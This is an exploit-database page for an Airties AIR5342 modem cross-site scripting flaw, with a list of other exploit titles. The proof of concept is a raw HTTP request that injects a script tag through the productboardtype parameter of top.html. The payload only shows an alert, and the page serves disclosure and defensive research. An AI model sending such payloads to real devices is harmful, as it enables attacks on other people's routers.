Search for hundreds of thousands of exploits

"Airties AIR5342 1.0.0.18 - Cross-Site Scripting"

Author

Exploit author

"Ismail Tasdelen"

Platform

Exploit platform

hardware

Release date

Exploit published date

2018-10-03

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# Exploit Title: Airties AIR5342 1.0.0.18 - Cross-Site Scripting
# Date: 25-09-2018
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: [https://www.airties.com/]
# Software [http://www.airties.com.tr/support/dcenter/]
# Version: [1.0.0.18]
# Affected products: AIR5342, AIR5343v2, AIR5443v2, AIR5453, AIR5442, AIR5750, AIR5650, AIR5021
# Tested on: MacOS High Sierra / Linux Mint / Windows 10
# CVE : CVE-2018-17593, CVE-2018-17590, CVE-2018-17591, CVE-2018-17588, CVE-2018-17587
  
# A cross site scripting vulnerability has been discovered in the AIR5342 modem of the AirTies manufacturer. 
# AirTies Air 5342 devices have XSS via the top.html productboardtype parameter.  
  
# HTTP Requests :

GET /top.html?page=main&productboardtype=%3Cscript%3Ealert(%22Ismail%20Tasdelen%22);%3C/script%3E HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Release DateTitleTypePlatformAuthor
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
Release DateTitleTypePlatformAuthor
2020-01-31"FlexNet Publisher 11.12.1 - Cross-Site Request Forgery (Add Local Admin)"webappsphp"Ismail Tasdelen"
2020-01-17"GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-17"APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-16"Tautulli 2.1.9 - Denial of Service ( Metasploit )"webappsmultiple"Ismail Tasdelen"
2020-01-15"Huawei HG255 - Directory Traversal ( Metasploit )"webappshardware"Ismail Tasdelen"
2020-01-14"IBM RICOH InfoPrint 6500 Printer - HTML Injection"webappshardware"Ismail Tasdelen"
2020-01-14"IBM RICOH 6400 Printer - HTML Injection"webappshardware"Ismail Tasdelen"
2020-01-13"SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-13"TaskCanvas 1.4.0 - 'Registration' Denial Of Service"doswindows"Ismail Tasdelen"
2020-01-13"Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-13"SpotDialup 1.6.7 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)"webappsphp"Ismail Tasdelen"
2020-01-06"RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"SpotIM 2.2 - 'Name' Denial Of Service"doswindows"Ismail Tasdelen"
2020-01-06"BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"SpotIE 2.9.5 - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)"doswindows"Ismail Tasdelen"
2020-01-06"NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service"doswindows"Ismail Tasdelen"
2020-01-06"IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting"webappshardware"Ismail Tasdelen"
2019-12-30"XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin)"webappshardware"Ismail Tasdelen"
2019-12-30"RICOH SP 4510SF Printer - HTML Injection"webappshardware"Ismail Tasdelen"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/45525/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.